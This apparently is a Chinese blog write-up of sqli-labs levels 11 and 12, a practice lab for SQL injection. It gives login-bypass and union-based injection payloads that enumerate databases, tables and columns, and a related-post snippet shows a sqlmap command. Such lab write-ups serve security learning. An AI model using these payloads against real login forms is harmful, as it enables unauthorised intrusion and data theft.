sqli-labs(11-12)

原创 已于 2023-11-14 10:33:36 修改 · 202 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http #sql

于 2023-04-17 19:27:16 首次发布
文章详细介绍了如何通过字符型注入攻破登录页面,利用万能密码和SQL查询技巧探测数据库信息,包括GET和POST请求的区别,以及在POST请求中的安全考量。通过对不同闭合符号的测试,揭示了数据库结构和数据,展示了SQL注入攻击的过程。

第十一关

我们打开页面之后发现是一个登录的页面

我们先尝试一下万能密码

admin

1‘ or 1=1#

 

我们可以查看一下他是不是字符型注入

admin

1’

 是字符型注入,单引号的字符型注入

我们可以登录成功,但是我们会发现这道题与前面的不一样,这道题是post请求的方式,因为我们没有在地址栏 里看到传入的参数

get和post的区别

GET和POST是HTTP请求的两种基本方法,还有PUT,DELETE,分别对应的是查,改,增,删

GET和POST本质上都是TCP链接

GET产生一个TCP数据包;POST产生两个TCP数据包

规范中get是用来获取信息的,而post是用来传递实体的

get请求的参数要放在url上,post请求的参数要放在请求的正文

GET请求只能进行url编码,而POST支持多种编码方式。

GET只接受ASCII字符,而POST没有限制。大小上也有限制post大于get,url有限制

post要比get安全性高一点,因为用get方法提交数据时,用户名和密码将出现在URL上,页面也可以被其他人访问,而post是放在HTTP包的body中,具有一定的隐蔽性。

所以我们就会看到这道题没有在url上显示我们输入的用户名密码,所以是post请求

然后我们查看字段数

admin

1' order by 2#

 1' order by 3#

 我们就可以看出只有俩个字段

我们接着查看它的显示位

admin

1' union select 1,2#

 我们就可判断库名

admin

1' union select 1,database()#

 判断表名

admin

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

 查出有四张表,我们还是从第一张查起,接着查列名

admin

1'union select 1,group_concat(column_name) from information_schema.columns where table_name='emails'#

 我们可以看出其中的列名是id,我们接着查数据

admin

1' union select 1,id from emails#

 就可以看到我们想要的内容

第十二关

我们接着打开题目也是一个登录页面

我们也是先上万能密码

admin

1' or 1=1#

 看看是不是字符型注入

admin

1’      或者是其它的,发现1'是不对的,然后接着试1"

 我们就可以看出有双引号和括号   ")

然后我们就")闭合

1") union select 1,database()#

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#

1")union select 1,group_concat(column_name) from information_schema.columns where table_name='emails'#

1")union select 1,id from emails#

和上一关差不多只是闭合的符号不一样

sqli-labs学习笔记
2301_81574836的博客
03-20 656
sqli-labs学习笔记1
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 7173
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
sqli-labs第十一关
yuqnqi的博客
05-08 292
进入目录D:\LeStoreDownload\phpStudyjiayou\phpstudy_pro\WWW\sqli-labs-master\Less-11。试试其他的吧 username=1' or '1'='1 password=1' order by 2#因为1=1为永真式,与前面的or结合,再加上注释符注释掉and后面的语句,where后语句直接为真。URL中%27是单引号',%23是井号#尝试使用万能登录 1' or 1=1#第一步,判断闭合方式嘛,单引号闭合。输入1' or 1=1#
where后面加“1=1“还是不加
qq_40959562的博客
02-20 1334
where后面加"1=1"还是不加 比如现在有一个场景,DB数据库中有一张博客表(blog),想把blog表中的所有记录查询出来,那么可以有两种方式操作。一种写法是where关键词什么也不加,另一种写法是where关键词后面加"1=1",写法如下: where关键词什么也不加 select * from blog; where关键词后面加 “1=1” select * from blog where 1 = 1; 这两种SQL语句查询所得到的结果完全没有区别。那为什么要在where关键字后面添加"1=1
详细sqli-labs1-65)通关讲解
热门推荐
dreamthe的博客
05-17 22万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-优快云博客_sql注入数据包 ​...
sqli-labs通关全详解
Keeping it fresh at all times.
10-08 6920
为探讨清楚SQL注入的诸多细节,我们特以经典的sqli-labs进行从入门到进阶的强化训练。在做题过程中,作者进行了全面、详细、系统的总结,形成了sqli-labs的详细题解。
sqli-labs:Less-12关卡详细解析
qq_62000508的博客
07-31 647
本文介绍了SQL注入实验sqli-labs12关的详细解法。文章首先分析了该关卡的SQL语句特点(字符串型注入、POST请求),然后提供了完整的手工注入步骤,包括判断注入点、确定回显点、获取数据库信息、表名、字段和数据的详细过程。同时介绍了使用SQLMap工具进行自动化测试的方法和参数说明。文章强调该解法与第11关类似,并提供了相关参考资料。最后声明本文仅用于安全学习目的,严禁非法测试。全文结构清晰,包含详细的代码示例和可视化截图,适合SQL注入学习者参考。
sqli-labs靶场第7-10关
foxfoxfoxfoxxxx的博客
07-09 1243
摘要:本文介绍了sqli-labs靶场在线版7-10关的SQL注入方法。第7关使用'))闭合布尔盲注,通过length()、ascii()和substr()函数逐步猜解数据库信息;第8关是单引号闭合布尔盲注;第9关采用单引号闭合时间盲注,利用if()和sleep()函数根据响应延迟判断条件真假;第10关为双引号闭合时间盲注。每关都详细演示了从猜解数据库长度、名称到表名、列名和数据的完整过程,并建议使用sqlmap等自动化工具。
sqli-labs靶场搭建
weixin_75168674的博客
04-05 748
下 XAMPP → 解压 sqli-labs 到 htdocs →建 security 数据库 → 导入 SQL →访问 localhost/sqli-labs 开干!
sqli-labs靶场 less 12
2301_76596810的博客
04-14 427
根据报错提示 near ‘“1"”) and password=(“”) LIMIT 0,1’无报错,说明闭合成功,闭合方式是 " )判断字段数,回显位,报数据。原理和less 11一样。sql注入的基本步骤。
精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包,特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台,帮助用户深入理解SQL注入攻击的原理,并提升相应的防御技巧。 ...
sqli-labs-master 靶场环境
08-30
sqli-labs-master 靶场环境
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
精选资源
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
sqli-labs注入完全手册:sqli-labs全关卡通关详解与技巧总结
02-24
sqli-labs是一款流行的学习SQL注入技术的靶场平台,它包含多个关卡,旨在帮助信息安全从业者和爱好者通过实战练习掌握SQL注入的原理与技巧。本书《sqli-labs注入完全手册:sqli-labs全关卡通关详解与技巧总结》提供...
HTTP/2 帧格式与流机制详解
m0_74186706的博客
01-05 694
一、帧、消息、流的关系三者是 HTTP/2 中数据传输的核心抽象,从微观到宏观依次为。
网络相关 - http基础讲解
尽日寻春不见春,芒鞋踏遍陇头云。归来笑拈梅花嗅,春在枝头已十分。
01-04 978
HTTP是现代互联网通信的基础协议,用于客户端与服务器之间的交互。本文全面解析HTTP协议的关键组成部分,包括请求方法(GET、POST等)、报文结构(请求行、头部、主体)、状态码及安全策略。重点介绍了HTTP头部字段,如内容协商(Accept、Content-Type)、请求控制(Host、Cache-Control)和响应控制(Location、ETag)等,帮助开发者深入理解Web通信机制并优化性能。HTTP默认无状态,通过明文传输(HTTPS加密),是现代Web开发的核心技术之一。
幽冥大陆(九十二 ) 封装 PHP HTTP 请求的 —东方仙盟练气期
最新发布
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
01-05 803
HTTP 请求的本质是 “数字世界的跨域传讯”,未来之窗_网络_API函数通过多参数适配,实现了 “万能传讯符” 的功能,覆盖 GET/POST/PUT/DELETE、多数据格式、证书验证等核心场景;对初学者而言,掌握 “请求方式(method)、数据格式(data)、身份验证(cert)” 三大核心参数,就能应对 80% 的 HTTP 请求场景;用 “东方仙盟 + 科技” 的比喻理解 HTTP 请求,核心是把抽象的技术概念转化为具象的 “传讯逻辑”,降低零基础学习的门槛。
理解:ssh http ftp基于tcp
Violet_YSWY的博客
01-05 361
你这个问题非常关键,而且你已经站在网络分层真正该问的问题上了 👍 我不堆术语,用**“分层 + 各层职责”**把你这个疑惑彻底打掉。最常用的 TCP/IP 四层模型: 👉 HTTP / SSH / FTP 都在“应用层” 👉 TCP 在“传输层”TCP 只关心 6 件事:1️⃣ 建立连接(3 次握手) 2️⃣ 保证数据不丢 3️⃣ 保证顺序 4️⃣ 发现重传 5️⃣ 流量控制 6️⃣ 拥塞控制👉 TCP 不关心:它们做的是 “应用层规则”。我给你并排对比,一眼就懂 👇不管你拉的是:HTTP:SSH
sqli-labs 11 sqlmap
01-27
### 使用Sqlmap解决Sqli-Labs Level 11 SQL注入挑战 对于Sqli-Labs第十一关的SQL注入问题,可以利用`sqlmap`工具来自动化检测并利用存在的漏洞。具体操作如下: 为了启动针对特定URL的测试,并尝试识别和利用可能存在于参数中的SQL注入缺陷,命令结构通常如下所示[^1]: ```bash python sqlmap.py -u "目标网址?参数名=参数值" ``` 考虑到Level 11涉及的是基于布尔盲注的方式,在构建请求时应确保所使用的payload能够绕过任何潜在的过滤机制。例如,如果遇到关键字被阻止的情况,则可以通过调整查询语句的形式来进行规避[^2]。 一个完整的用于攻击Sqli-Labs Lesson 11的例子可能是这样的: ```bash python sqlmap.py -u "http://localhost/sqli/Less-11/?id=1" --batch --level=5 --risk=3 --technique=B --dbms=mysql ``` 此命令指定了要扫描的目标链接(`-u`);自动确认所有提示(`--batch`);设置更深入的数据收集级别(`--level=5`)以及风险等级(`--risk=3`);仅采用布尔型时间延迟技术(`--technique=B`);并且假设后端数据库为MySQL(`--dbms=mysql`)。 一旦成功验证存在可利用的注入点之后,就可以进一步探索该应用背后的数据库架构,比如枚举出所有的表格名称或是读取敏感数据等内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值